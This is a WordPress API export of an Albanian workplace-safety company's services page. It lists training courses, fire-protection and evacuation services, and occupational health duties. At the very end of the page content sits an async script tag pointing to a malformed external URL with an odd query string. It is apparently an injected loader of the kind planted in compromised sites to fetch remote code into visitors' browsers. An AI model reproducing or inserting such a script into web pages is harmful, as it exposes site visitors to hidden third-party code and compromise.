{"id":10,"date":"2016-10-20T09:57:23","date_gmt":"2016-10-20T09:57:23","guid":{"rendered":"http:\/\/trajf.albweb.al\/?page_id=10"},"modified":"2016-10-27T08:42:02","modified_gmt":"2016-10-27T08:42:02","slug":"sherbime","status":"publish","type":"page","link":"https:\/\/www.trajf.al\/index.php\/sherbime\/","title":{"rendered":"Sherbime"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column animation=&#8221;zoomIn&#8221;][vc_custom_heading text=&#8221;SHERBIMET TONA&#8221; font_container=&#8221;tag:h2|font_size:28px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;]<div class=\"hr-thin style-line\" style=\"width: 100%;border-color: #faa433;border-top-width: 1px;\"><\/div>[vc_empty_space height=&#8221;50px&#8221;][\/vc_column][\/vc_row][vc_row type=&#8221;vc_default&#8221; bg_type=&#8221;image&#8221; parallax_style=&#8221;vcpb-default&#8221; bg_image_repeat=&#8221;no-repeat&#8221; bg_img_attach=&#8221;fixed&#8221;][vc_column width=&#8221;1\/3&#8243; animation=&#8221;zoomIn&#8221;][vc_single_image image=&#8221;225&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Siguria ne pune&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;50px&#8221;][vc_single_image image=&#8221;222&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Import, Export &amp; Tregtim&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; animation=&#8221;zoomIn&#8221;][vc_single_image image=&#8221;221&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Trajnime&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;50px&#8221;][vc_single_image image=&#8221;219&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Mbrojtja ndaj zjarrit&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; animation=&#8221;zoomIn&#8221;][vc_single_image image=&#8221;218&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Asistence Teknike&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;50px&#8221;][vc_single_image image=&#8221;227&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Ekspertize &amp; Inspektime&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;50px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243; animation=&#8221;fadeInLeftBig&#8221; css=&#8221;.vc_custom_1477410762689{border-top-width: 20px !important;border-right-width: 20px !important;border-bottom-width: 20px !important;border-left-width: 20px !important;padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;background-color: #f9f9f9 !important;}&#8221;][vc_custom_heading text=&#8221;Trajnime dhe kurse per:&#8221; font_container=&#8221;tag:h2|font_size:24px|text_align:left|color:%23f9a528&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Koordinator per sigurine dhe shendetin ne pune<\/li>\n<li>Oficer i sigurise dhe shendetit ne pune<\/li>\n<li>Teknik per sigurine dhe shendetin ne pune<\/li>\n<li>Koordinator i skuadres se emergjencave<\/li>\n<li>Oficer i skuadres se emergjencave<\/li>\n<li>Teknik i mbrojtjes ndaj zjarrit dhe evakuimit<\/li>\n<\/ul>\n<\/div>[\/vc_column][vc_column width=&#8221;1\/2&#8243; animation=&#8221;fadeInRightBig&#8221;]<section class=\"shortcode-action-box table shortcode-action-bg block-style-widget\"><div class=\"text-big\"><p style=\"text-align: justify;\">Q\u00ebndra\u00a0e Siguris\u00eb dhe Sh\u00ebndetit n\u00eb Pun\u00eb <strong>\u201cTRAJF\u201d<\/strong> mb\u00ebsht\u00ebtur n\u00eb p\u00ebrkufizimin e pik\u00ebs 16 t\u00eb nenit 5 dhe pik\u00ebs 3 t\u00eb nenit 7 t\u00eb Ligjit Nr. 10237 Dat\u00eb 18.02.2010 \u201cP\u00ebr Sigurin\u00eb dhe Sh\u00ebndetin n\u00eb Pun\u00eb\u201d ofron p\u00ebr t\u00eb gjith\u00eb sektor\u00ebt e veprimtaris\u00eb private dhe publike:<\/p>\n<\/div><\/section>[vc_empty_space height=&#8221;70px&#8221;]<div id=\"modal-trg-txt-wrap-6339\" class=\"ult-modal-input-wrapper ult-adjust-bottom-margin    \" data-keypress-control=\"keypress-control-enable\" data-overlay-control=\"overlay-control-enable\"><button  data-ultimate-target='#modal-trg-txt-wrap-6339 .btn-modal'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  style=\"background:#faa433;border-color:#faa433;color:#FFFFFF; \" data-class-id=\"content-69e1e564bba206-86355607\" class=\"btn-modal ult-responsive btn-primary btn-modal-lg overlay-show ult-align-center btn-id-69e1e564bba206-86355607\" data-overlay-class=\"overlay-slidedown\">Sherbimet e mbrojtjes nga zjarri dhe evakuimi<\/button><\/div>\n<div class=\"ult-overlay content-69e1e564bba206-86355607 \" data-class=\"content-69e1e564bba206-86355607\" id=\"button-click-overlay\" style=\"background:rgba(51,51,51,0.8); display:none;\">\n\t<div class=\"ult_modal ult-fade ult-container\">\n\t\t<div id=\"ult-modal-wrap-5439\" class=\"ult_modal-content ult-hide\" style=\"border-style:solid;border-width:2px;border-radius:0px;border-color:#333333;\">\n\t\t\t<div class=\"ult_modal-header\" style=\"background:#faa433;color:#333333;border-color:#333333;\">\n\t\t\t\t<h3  data-ultimate-target='#ult-modal-wrap-5439 .ult_modal-title'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  class=\"ult_modal-title ult-responsive\">Sherbimet e mbrojtjes nga zjarri dhe evakuimi<\/h3>\n\t\t\t<\/div>\n\t\t\t<div  data-ultimate-target='#ult-modal-wrap-5439 .ult_modal-body'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  class=\"ult_modal-body ult-responsive ult-html\" style=\"\">\n\t\t\t<\/p>\n<ul>\n<li>Hartimi dhe pergatitja e dokumentacionit te projekteve teknike , per Mbrojtjen nga zjarri dhe per Shpetimin.<\/li>\n<li>Hartimi i &#8220;Akt-ekspertizave&#8221; per zjarret e rena.<\/li>\n<li>Krijimin e Planeve te trajnimit ( TEORI DHE PRAKTIKE )<\/li>\n<li>Informimin e punonjesve ne lidhje me Mbrojtjen nga zjarri dhe evakuimin.<\/li>\n<li>Trajnimin dhe krijimin e skuadrave zjarrfikse.<\/li>\n<li>Perpilimin dhe Hartimin e rregulloreve te brendshme per Mbrojtjen nga zjarri.<\/li>\n<li>Trajnimin per menyren e perdorimit te sistemeve te shuarjes se zjarrit qe kompanite disponojne.<\/li>\n<li>Perdorimin konkret ne praktike te sistemeve te diktim-sinjalizimit, hidranteve zjarrfiks, fikseve te zjarrit, veshjen e kostumit zjarrdurues etj.<\/li>\n<li>Pergatitjen e skemave te evakuimit.<\/li>\n<li>Evakuimin e ndertesave.<\/li>\n<li>Shpetimin e jeteve ne raste zjarresh dhe emergjencash te tjera.<\/li>\n<li>Mbajtjen e proces-verbaleve dhe gjithe dokumentacionit te nevojshem per trajnimet e kryera sipas ligjit .<\/li>\n<li>Certifikimin e personave qe kryejne kurset e mbrojtjes nga zjarri dhe evakuimit.<\/li>\n<\/ul>\n<p>\n\t\t\t<\/div>\n\t<\/div>\n\t<\/div>\n\t<div class=\"ult-overlay-close top-right\" style=\" \"><div class=\"ult-overlay-close-inside\">Close<\/div><\/div>\n<\/div><div id=\"modal-trg-txt-wrap-1294\" class=\"ult-modal-input-wrapper ult-adjust-bottom-margin    \" data-keypress-control=\"keypress-control-enable\" data-overlay-control=\"overlay-control-enable\"><button  data-ultimate-target='#modal-trg-txt-wrap-1294 .btn-modal'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  style=\"background:#faa433;border-color:#faa433;color:#FFFFFF; \" data-class-id=\"content-69e1e564bbac53-40873958\" class=\"btn-modal ult-responsive btn-primary btn-modal-lg overlay-show ult-align-center btn-id-69e1e564bbac53-40873958\" data-overlay-class=\"overlay-cornerbottomleft\">Sherbime per sigurine dhe shendetin ne pune<\/button><\/div>\n<div class=\"ult-overlay content-69e1e564bbac53-40873958 \" data-class=\"content-69e1e564bbac53-40873958\" id=\"button-click-overlay\" style=\"background:rgba(51,51,51,0.8); display:none;\">\n\t<div class=\"ult_modal ult-fade ult-medium\">\n\t\t<div id=\"ult-modal-wrap-773\" class=\"ult_modal-content ult-hide\" style=\"border-style:solid;border-width:2px;border-radius:0px;border-color:#333333;\">\n\t\t\t<div class=\"ult_modal-header\" style=\"background:#faa433;color:#333333;border-color:#333333;\">\n\t\t\t\t<h3  data-ultimate-target='#ult-modal-wrap-773 .ult_modal-title'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  class=\"ult_modal-title ult-responsive\">Sherbime per sigurine dhe shendetin ne pune duke mare parasysh<\/h3>\n\t\t\t<\/div>\n\t\t\t<div  data-ultimate-target='#ult-modal-wrap-773 .ult_modal-body'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  class=\"ult_modal-body ult-responsive ult-html\" style=\"background:#ffffff;\">\n\t\t\t<\/p>\n<ul>\n<li>T\u00eb organizoj\u00eb veprimtarin\u00eb e siguris\u00eb dhe sh\u00ebndetit n\u00eb pun\u00eb n\u00eb subjektin e kontraktuar dhe nj\u00ebkoh\u00ebsisht ta monitoroj\u00eb at\u00eb.<\/li>\n<li>T\u00eb p\u00ebrpiloj\u00eb dhe mbaj\u00eb dokumentacionin sipas k\u00ebrkesave t\u00eb legjislacionit shqiptar n\u00eb fush\u00ebn e siguris\u00eb dhe sh\u00ebndetit n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb bashk\u00ebpunoj\u00eb me drejtuesit e kompanis\u00eb p\u00ebr marrjen e masave t\u00eb siguris\u00eb dhe sh\u00ebndetit n\u00eb pun\u00eb n\u00eb p\u00ebrshtatje me pro\u00e7eset e pun\u00ebs.<\/li>\n<li>T\u00eb b\u00ebj\u00eb kontroll periodik p\u00ebr gjendjen e masave mbrojt\u00ebse n\u00eb pun\u00eb dhe zbatimin e rregullave t\u00eb siguris\u00eb dhe sh\u00ebndetit n\u00eb pun\u00eb nga t\u00eb gjith\u00eb personat, punonj\u00ebs t\u00eb kompanis\u00eb apo kontraktor e n\u00ebnkontraktor q\u00eb veprojn\u00eb n\u00eb territorin apo objektet e kompanis\u00eb.<\/li>\n<li>T\u00eb jap\u00eb asistenc\u00eb q\u00eb n\u00eb faz\u00ebn e k\u00ebrkimit, t\u00eb projektimit dhe nd\u00ebrtimit t\u00eb nd\u00ebrtesave, t\u00eb v\u00ebnies n\u00eb pun\u00eb t\u00eb makinerive e pajisjeve, t\u00eb teknologjive q\u00eb do t\u00eb p\u00ebrdoren p\u00ebr zvog\u00eblimin dhe shmangien e rreziqeve p\u00ebr aksidente n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb hartoj\u00eb n\u00eb bashk\u00ebpunim me administrat\u00ebn e subjektit rregulloret e p\u00ebrgjithshme p\u00ebr sigurin\u00eb dhe sh\u00ebndetin n\u00eb pun\u00eb, t\u2019i specifikoj\u00eb k\u00ebto p\u00ebr veprimtari dhe vende t\u00eb ve\u00e7anta t\u00eb pun\u00ebs si dhe t\u00eb p\u00ebrpiloj\u00eb udh\u00ebzime e p\u00ebrgjegj\u00ebsi n\u00eb plot\u00ebsimin e detyrave nga strukturat e ndryshme t\u00eb nd\u00ebrmarrjes p\u00ebr sigurin\u00eb dhe sh\u00ebndetin n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb kryej\u00eb n\u00eb m\u00ebnyr\u00eb periodike sipas p\u00ebrcaktimeve n\u00eb marr\u00ebveshje kontrollin e br\u00ebndsh\u00ebm mbi zbatimin e rregullave t\u00eb siguris\u00eb n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb p\u00ebrgatis\u00eb dhe t\u00eb k\u00ebrkoj\u00eb vendosjen n\u00eb vendet e pun\u00ebs dhe mbi secil\u00ebn pajisje e makineri tabela paralajm\u00ebruese, shenja sigurie, udh\u00ebzime e rregulla p\u00ebr mbrojtjen n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb b\u00ebj\u00eb kurse trajnimi p\u00ebr informimin e personave, t\u00eb cil\u00ebt do t\u00eb fillojn\u00eb pun\u00eb n\u00eb nd\u00ebrmarrje, p\u00ebr rreziqet ndaj t\u00eb cilave ata mund t\u00eb ekspozohen n\u00eb vendin e pun\u00ebs q\u00eb do caktohen t\u00eb punojn\u00eb si dhe p\u00ebr masat parandaluese dhe mbrojt\u00ebse q\u00eb duhet t\u00eb merren. Personat e trajnuar pajisen me d\u00ebshmin\u00eb p\u00ebrkat\u00ebse t\u00eb siguris\u00eb e sh\u00ebndetit n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb p\u00ebrgatis\u00eb programin, i cili do t\u00eb p\u00ebrdit\u00ebsohet e ndryshohet sipas formave dhe llojeve t\u00eb reja t\u00eb rrezikut, p\u00ebr sigurin\u00eb dhe sh\u00ebndetin n\u00eb pun\u00eb t\u00eb p\u00ebrshtatur me vendet specifike t\u00eb pun\u00ebs.<\/li>\n<li>T\u00eb informoj\u00eb punonj\u00ebsit p\u00ebr sigurin\u00eb e sh\u00ebndetin n\u00eb pun\u00eb, pasi t\u00eb marr\u00eb njoftim nga nd\u00ebrmarrja, kur:<\/li>\n<li>Vendosen n\u00eb pun\u00eb teknologji t\u00eb reja apo makineri dhe mjete t\u00eb reja pune.<\/li>\n<li>Procesi i pun\u00ebs ndryshon n\u00eb nj\u00eb m\u00ebnyr\u00eb q\u00eb rreziku ndikon n\u00eb nivelin e sh\u00ebndetit dhe t\u00eb mbrojtjes n\u00eb pun\u00eb.<\/li>\n<li>Transferohet apo ndryshon punonj\u00ebsi vendin e pun\u00ebs.<\/li>\n<li>T\u00eb informoj\u00eb punonj\u00ebsit e t\u00eb gjith\u00eb sektor\u00ebve p\u00ebr \u00e7do rrezik n\u00eb vendin e pun\u00ebs secilit si dhe p\u00ebr masat e siguris\u00eb q\u00eb duhet t\u00eb merren p\u00ebr t\u00eb kontrolluar k\u00ebto rreziqe dhe p\u00ebr t\u00eb shmangur pasojat e rrezikshme.<\/li>\n<li>T\u2019i paraqes personave p\u00ebrgjegj\u00ebs n\u00eb nd\u00ebrmarrje k\u00ebrkes\u00ebn p\u00ebr plot\u00ebsimin e kushteve t\u00eb nevojshme p\u00ebr informimin dhe trajnimin e punonj\u00ebsve n\u00ebp\u00ebrmjet posterave, fletushkave, filmave dhe filmimeve q\u00eb lidhen me sigurin\u00eb dhe sh\u00ebndetin n\u00eb pun\u00eb.<\/li>\n<li>T\u00eb kontrolloj\u00eb dhe monitoroj\u00eb n\u00eb vazhdim\u00ebsi funksionimin e sistemeve e mjeteve mbrojt\u00ebse dhe ato t\u00eb shuarjes zjarrit, pajisjet e mjetet e diktim \u2013 sinjalizimit.<\/li>\n<li>T\u00eb evidentoj\u00eb e kontrolloj\u00eb l\u00ebnd\u00ebt dhe substancat e rrezikshme q\u00eb jan\u00eb n\u00eb ruajtje apo q\u00eb \u00e7lirohen nga proceset teknologjike si dhe t\u00eb bashk\u00ebpunoj\u00eb me sh\u00ebrbimet e specializura p\u00ebr riparimin, mir\u00ebmbajtjen, z\u00ebv\u00ebndsimin e mjeteve mbrojt\u00ebse ndaj tyre e neutralizimin e l\u00ebnd\u00ebve t\u00eb rrezikshme.<\/li>\n<li>T\u00eb kryej\u00eb vler\u00ebsim t\u00eb rreziqeve p\u00ebr sigurin\u00eb dhe sh\u00ebndetin n\u00eb pun\u00eb, p\u00ebrfshir\u00eb dhe ato pozicione pune q\u00eb ekspozojn\u00eb punonj\u00ebsit me rreziqe t\u00eb ve\u00e7anta e t\u00eb shtuara.<\/li>\n<li>T\u00eb p\u00ebrpiloj\u00eb dokumentin e vler\u00ebsimit dhe parandalimit t\u00eb rreziqeve p\u00ebr nd\u00ebrmarrjen apo aktivitetin por edhe sipas kushteve specifike t\u00eb secilit vend pune.<\/li>\n<li>T\u00eb p\u00ebrgatis\u00eb udh\u00ebzimet e holl\u00ebsishme, q\u00eb do tu vihen n\u00eb dispozicion t\u00eb gjith\u00eb punonj\u00ebsve n\u00ebp\u00ebrmjet p\u00ebrgjegj\u00ebsave t\u00eb reparteve apo grupeve t\u00eb pun\u00ebs, n\u00eb zbatim t\u00eb dokumentit t\u00eb vler\u00ebsimit dhe parandalimit t\u00eb rrezikut p\u00ebr \u00e7do vend pune. Ky veprim do t\u00eb dokumentohet n\u00ebp\u00ebrmjet procesverbaleve q\u00eb do t\u00eb mbahen nd\u00ebrmjet pal\u00ebve.<\/li>\n<li>T\u00eb b\u00ebj\u00eb vler\u00ebsimin p\u00ebr rreziqet dhe ekspozimin ndaj agjent\u00ebve t\u00eb rreziksh\u00ebm n\u00eb proceset dhe kushtet e pun\u00ebs q\u00eb mund t\u00eb p\u00ebrb\u00ebjn\u00eb rrezik t\u00eb ve\u00e7ant\u00eb p\u00ebr grupet e rrezikuara t\u00eb punonj\u00ebsve.<\/li>\n<li>T\u00eb rekomandoj\u00eb p\u00ebr pun\u00ebdh\u00ebn\u00ebsin p\u00ebrshtatjen e vendit t\u00eb pun\u00ebs kur ekspozimi ndaj agjent\u00ebve t\u00eb rreziksh\u00ebm t\u00eb proceseve apo kushteve t\u00eb pun\u00ebs p\u00ebrb\u00ebn nj\u00eb rrezik p\u00ebr sigurin\u00eb dhe sh\u00ebndetin e grave shtat\u00ebzana, n\u00ebna me f\u00ebmij\u00eb n\u00eb gji apo t\u00eb mitur q\u00eb nuk kan\u00eb arritur pjekurin\u00eb e tyre.<\/li>\n<li>T\u00eb p\u00ebrgatis dokumentacionin p\u00ebr organizimin, p\u00ebrb\u00ebrjen, m\u00ebnyr\u00ebn e funksionit dhe rifreskimin n\u00eb rast nevoje t\u00eb k\u00ebshillit siguris\u00eb dhe sh\u00ebndetit n\u00eb pun\u00eb t\u00eb nd\u00ebrmarrjes.<\/li>\n<li>T\u00eb p\u00ebrgatis\u00eb materialin njoftues, n\u00eb em\u00ebr t\u00eb nd\u00ebrmarrjes p\u00ebr institucionet shtet\u00ebrore sipas ligjit, kur ndodhin aksidente.<\/li>\n<li>T\u00eb ndjek dhe t\u00eb analizoj\u00eb t\u00eb dh\u00ebnat n\u00eb lidhje me aksidentet n\u00eb pun\u00eb dhe s\u00ebmundjet profesionale dhe t\u00eb nxjerr\u00eb raportet sipas afateve ligjore p\u00ebr nevojat e Administratorit.<\/li>\n<li>T\u00eb b\u00ebj\u00eb dokumentacionin e vler\u00ebsimit t\u00eb aksidenteve kur ato ndodhin n\u00eb pun\u00eb apo p\u00ebr shkak t\u00eb pun\u00ebs duke vler\u00ebsuar kushtet dhe rrethanat n\u00eb t\u00eb cilat kan\u00eb ndodhur aksidente.<\/li>\n<\/ul>\n<p>\n\t\t\t<\/div>\n\t<\/div>\n\t<\/div>\n\t<div class=\"ult-overlay-close top-right\" style=\" \"><div class=\"ult-overlay-close-inside\">Close<\/div><\/div>\n<\/div>[\/vc_column][\/vc_row]<script async src='https:\/\/\/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column animation=&#8221;zoomIn&#8221;][vc_custom_heading text=&#8221;SHERBIMET TONA&#8221; font_container=&#8221;tag:h2|font_size:28px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;50px&#8221;][\/vc_column][\/vc_row][vc_row type=&#8221;vc_default&#8221; bg_type=&#8221;image&#8221; parallax_style=&#8221;vcpb-default&#8221; bg_image_repeat=&#8221;no-repeat&#8221; bg_img_attach=&#8221;fixed&#8221;][vc_column width=&#8221;1\/3&#8243; animation=&#8221;zoomIn&#8221;][vc_single_image image=&#8221;225&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Siguria ne pune&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;50px&#8221;][vc_single_image image=&#8221;222&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Import, Export &amp; Tregtim&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; animation=&#8221;zoomIn&#8221;][vc_single_image image=&#8221;221&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Trajnime&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;50px&#8221;][vc_single_image image=&#8221;219&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Mbrojtja ndaj zjarrit&#8221; font_container=&#8221;tag:h2|font_size:18px|text_align:center|color:%23faa433&#8243; google_fonts=&#8221;font_family:Montserrat%3Aregular%2C700|font_style:400%20regular%3A400%3Anormal&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; animation=&#8221;zoomIn&#8221;][vc_single_image image=&#8221;218&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_custom_heading text=&#8221;Asistence&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-10","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/pages\/10","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":11,"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/pages\/10\/revisions"}],"predecessor-version":[{"id":280,"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/pages\/10\/revisions\/280"}],"wp:attachment":[{"href":"https:\/\/www.trajf.al\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}